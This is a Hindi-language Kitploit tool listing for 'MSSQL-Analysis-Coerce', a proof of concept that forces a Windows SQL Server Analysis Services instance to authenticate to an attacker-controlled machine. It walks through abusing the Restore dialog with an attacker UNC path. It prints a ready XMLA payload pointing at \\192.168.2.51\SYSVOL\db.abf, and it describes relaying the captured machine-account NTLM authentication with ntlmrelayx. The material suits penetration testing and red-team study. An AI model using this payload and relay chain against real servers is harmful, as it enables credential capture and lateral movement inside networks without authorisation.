Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
MSSQL-Analysis-Coerce — एक तकनीक जो Windows SQL Server को किसी भी मनमानी मशीन पर प्रमाणित (authenticate) होने के लिए बाध्य करती है। | Kitploit
उपकरण/GitHubGitHub/p0dalirius/mssql-analysis-coerce
शोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगप्रतिकूल हमला
GitHubp0dalirius/mssql-analysis-coerce

MSSQL-Analysis-Coerce

एक तकनीक जो Windows SQL Server को किसी भी मनमानी मशीन पर प्रमाणित (authenticate) होने के लिए बाध्य करती है।

रिपॉजिटरी देखें
133132 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

MSSQL Analysis Services - जबरन प्रमाणीकरण

किसी विंडोज़ SQL सर्वर को किसी मनमानी मशीन पर प्रमाणित करने के लिए विवश करने की एक तकनीक।

यह प्रूफ ऑफ कॉन्सेप्ट निम्नलिखित द्वारा सह-लेखित है:

  • Podalirius: YouTube Channel Subscribers
  • Worty:

प्रूफ ऑफ कॉन्सेप्ट

स्थानीय मशीन खाते के रूप में प्रमाणीकरण ट्रिगर करने के लिए, हमें उपयोगकर्ता क्रेडेंशियल्स का उपयोग करके रिमोट SQL सर्वर से कनेक्ट करना होगा:

फिर हम किसी दिए गए फ़ाइल से डेटाबेस को पुनर्स्थापित करने के लिए "Restore" चुनेंगे।

XMLA फ़ाइल उत्पन्न करने के लिए, "Backup File" फ़ॉर्म में किसी यादृच्छिक फ़ाइल का पथ डालें, और Ok पर क्लिक करें।

फिर किसी यादृच्छिक फ़ाइल के पथ को बदलें और इसे अपने हमलावर सर्वर के UNC पथ से बदलें (उदाहरण के लिए \\192.168.128\SYSVOL\db.abf)

प्रूफ ऑफ कॉन्सेप्ट XMLA क्वेरी (poc.xmla):

root@kitploit:~
<Restore xmlns="http://schemas.microsoft.com/analysisservices/2003/engine">
    <File>\\192.168.2.51\SYSVOL\db.abf</File>
    <DatabaseName>\\192.168.2.51\SYSVOL\db.abf</DatabaseName>
    <DbStorageLocation xmlns="http://schemas.microsoft.com/analysisservices/2008/engine/100/100">\\192.168.2.51\SYSVOL\db.abf</DbStorageLocation>
</Restore>

और हमें SQL सर्वर के स्थानीय मशीन खाते से एक प्रमाणीकरण प्राप्त होता है:

रिलेइंग: जीत के लिए

एक बार प्रमाणीकरण मिल जाने पर, हम इसे ntlmrelayx के साथ रिले कर सकते हैं ताकि कंप्यूटर SQL01$ की ओर से कई कार्य कर सकें।

यह बढ़िया है, लेकिन Linux हमलावर मशीन से इस जबरन प्रमाणीकरण को ट्रिगर करना जटिल है, क्योंकि हमारे पास SQL Server Management Studio (SSMS) तक पहुंच नहीं है।

संदर्भ

  • https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
  • https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
  • https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html
टूल डाउनलोड करें